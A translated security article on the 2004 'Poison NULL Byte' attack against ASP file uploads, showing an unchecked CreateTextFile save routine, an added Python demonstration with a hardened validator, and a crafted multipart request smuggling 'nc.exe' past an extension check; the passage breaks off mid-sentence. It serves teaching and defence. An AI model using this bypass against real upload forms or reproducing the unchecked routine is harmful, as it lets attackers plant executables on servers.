Kingbase
2011/8/1
Translator's brief description
This article is translated from "0x00 vs ASP File Uploads" by Brett Moore of Security-Assessment.com, written in 2004; the original is here: http: // response.
To put it bluntly, this is only useful when a form POST is used, and it only applies to file name variables and methods such as ASP's CreateTextFile.
Introduction
The Poison NULL Byte technique has not been widely applied to ASP, but as in other environments, a NULL byte can cause problems when ASP passes data on to objects.
A common problem in ASP-based uploads is that a NULL byte can be inserted into the file name, after which any extension can be appended to it. When the file is written, everything after the NULL byte is ignored.
In this way, checks on the extension can be bypassed, even if the extension is appended by the application itself.
This is similar to Perl/PHP; the difference is how the NULL byte is delivered to the ASP program.
The problem occurs when the data is compared and validated without checking for NULL bytes and is then passed directly to FileSystemObject.
This article discusses how the Poison NULL Byte attack applies to ASP upload scripts.
Scope
This article is limited to the following two conditions: the upload is sent as a POST (multipart/form-data) request, and the script uses the Scripting.FileSystemObject object.
We focus on the CreateTextFile method, which is used to write files. Other methods of the object may be affected in the same way.
A %00 or NULL byte cannot be sent in the URL or in a normal (URL-encoded) form POST, because the server does not store the value in the file name variable, treating it as the end of the string.
When the file name is sent as multipart/form-data, however, the NULL byte is stored in the file name variable and affects subsequent FileSystemObject calls.
File Upload
File upload usually uses an input element of type file together with the encoding type multipart/form-data.
The content type application/x-www-form-urlencoded is not suitable for sending large amounts of binary data or non-ASCII characters; multipart/form-data is the better choice.
A multipart/form-data message consists of several parts. The parts are sent to the processing agent in the same order as the corresponding controls appear in the document stream.
<form method="post" enctype="multipart/form-data" action="upload.asp">
Your Picture: <br> <input type="file" name="file"> <br>
<input type="submit" value="Upload">
</form>
When the form is submitted, the data is formatted as multipart/form-data. This encoding passes the POST data through unchanged, including any NULL bytes it contains.
File Storage
After a successful upload, the file is saved somewhere on the server. The following is typical file upload handling code:
Sub Save(filename)
    Dim objFSO, objFSOFile, path
    path = Server.MapPath("/uploads/")
    Set objFSO = Server.CreateObject("Scripting.FileSystemObject")
    ' filename is taken from the request and used unchecked
    Set objFSOFile = objFSO.CreateTextFile(path & "\" & filename)
    objFSOFile.Write <file contents>
    objFSOFile.Close
End Sub
When the file name parameter is passed to CreateTextFile, it may contain a NULL byte. The name of the created file is then truncated at the NULL byte, and everything after it is ignored.
Set objFSOFile = objFSO.CreateTextFile(path & "\" & filename)
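The following is an added example, not code from the original article or from Security-Assessment.com. It shows, in Python rather than ASP, why the situation described above defeats an extension check: a small multipart/form-data parser (an assumed stand-in for IIS's own request handling) keeps the NUL byte in the file name exactly as the article says IIS does; a naive check on the whole string passes; a function emulating a NUL-terminated API such as CreateTextFile shows the name that would actually be written, with or without an extension appended by the application; and a hardened check rejects the name. The request body, field names and the allow-list of extensions are constructed for the demonstration, and the file name is the one from the article's request with the NUL inserted before the final extension.

```python
"""Added demonstration of NUL-byte truncation in uploaded file names (not from the
original article). All sample data below is constructed for this example."""
import re

# Constructed multipart/form-data body. The boundary value mirrors the article's
# request; the field names ("file", "submit") are assumptions.
BOUNDARY = b"---------7d4cb161b009c"
RAW_BODY = (
    b"--" + BOUNDARY + b"\r\n"
    + b'Content-Disposition: form-data; name="file"; filename="c:\\nc.exe\x00.bmp"\r\n'
    + b"Content-Type: text/plain\r\n"
    + b"\r\n"
    + b"Proof Of Upload Test File\r\n"
    + b"--" + BOUNDARY + b"\r\n"
    + b'Content-Disposition: form-data; name="submit"\r\n'
    + b"\r\n"
    + b"Upload\r\n"
    + b"--" + BOUNDARY + b"--\r\n"
)

ALLOWED_EXTENSIONS = (".bmp", ".jpg", ".gif")   # assumed allow-list for the demo


def parse_multipart(body: bytes, boundary: bytes) -> dict:
    """Minimal multipart/form-data parser (assumed, not IIS's). Returns
    {field_name: (filename_or_None, content_bytes)}. Header values are copied
    byte for byte, so an embedded NUL in filename="..." survives the parse."""
    delimiter = b"--" + boundary
    fields = {}
    for chunk in body.split(delimiter)[1:]:
        if chunk.startswith(b"--"):          # closing delimiter "--boundary--"
            break
        if chunk.startswith(b"\r\n"):
            chunk = chunk[2:]
        headers, _, content = chunk.partition(b"\r\n\r\n")
        if content.endswith(b"\r\n"):
            content = content[:-2]
        name = re.search(rb';\s*name="([^"]*)"', headers)
        if name is None:
            continue
        fname = re.search(rb';\s*filename="([^"]*)"', headers)
        fields[name.group(1).decode("latin-1")] = (
            fname.group(1).decode("latin-1") if fname else None,
            content,
        )
    return fields


def naive_extension_check(filename: str) -> bool:
    """The check a typical upload script makes: look at the end of the whole
    string. It sees ".bmp" and passes, unaware that the string contains a NUL."""
    return filename.lower().endswith(ALLOWED_EXTENSIONS)


def name_as_written(filename: str) -> str:
    """Emulates what a NUL-terminated API such as CreateTextFile sees: the name
    ends at the first NUL byte, so anything after it, including an extension
    appended by the application, is lost."""
    return filename.split("\x00", 1)[0]


def hardened_filename(filename: str) -> str:
    """Defensive handling of the stored name: refuse NUL bytes outright, keep only
    the last path component (either separator), and require a conservative name
    with an allow-listed extension. Raises ValueError for anything else."""
    if "\x00" in filename:
        raise ValueError("NUL byte in file name")
    base = re.split(r"[\\/]", filename)[-1]
    exts = "|".join(re.escape(e[1:]) for e in ALLOWED_EXTENSIONS)
    if not re.fullmatch(rf"[A-Za-z0-9_-]{{1,64}}\.({exts})", base, re.IGNORECASE):
        raise ValueError(f"file name not allowed: {base!r}")
    return base


def is_safe_upload_name(filename: str) -> bool:
    """Convenience wrapper: True if hardened_filename() accepts the name."""
    try:
        hardened_filename(filename)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    submitted, _ = parse_multipart(RAW_BODY, BOUNDARY)["file"]
    print("submitted name :", repr(submitted))
    print("naive check    :", naive_extension_check(submitted))
    print("name on disk   :", repr(name_as_written(submitted)))
    print("with appended  :", repr(name_as_written(submitted + ".bmp")))
    print("hardened check :", is_safe_upload_name(submitted))
```

Running the block prints the submitted name with its NUL byte intact, a passing naive check, and a written name of `c:\nc.exe` in both cases, while the hardened check returns False. The point of `hardened_filename` is that rejecting the NUL byte is necessary but not sufficient on its own: the directory part is also dropped and the stored name is restricted to an allow-listed pattern, so the check does not depend on what a later NUL-terminated API will do with the string.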
NULL bytes
A NULL byte can be inserted manually, with a hex editor, or with a web proxy; in each case the multipart POST data itself must be modified.
Multipart Form Post
POST /upload.asp HTTP/1.0
Content-Type: multipart/form-data; boundary=---------7d4cb161b009c
Host: localhost
Content-Length: 359
Pragma: no-cache
Cookie: ASPSESSIONIDSAADRCRS=LAKNNAKAGMIBJCOOLBIFEHIK

-----------7d4cb161b009c
Content-Disposition: form-data; filename="c:\nc.exe.bmp"
Content-Type: text/plain

Proof Of Upload Test File
Brett.moore@security-assessment.com
-----------7d4cb161b009c
Content-Disposition: form-data;

Upload
-----------7d4cb161b009c--
Note that the above file name parameter has been changed: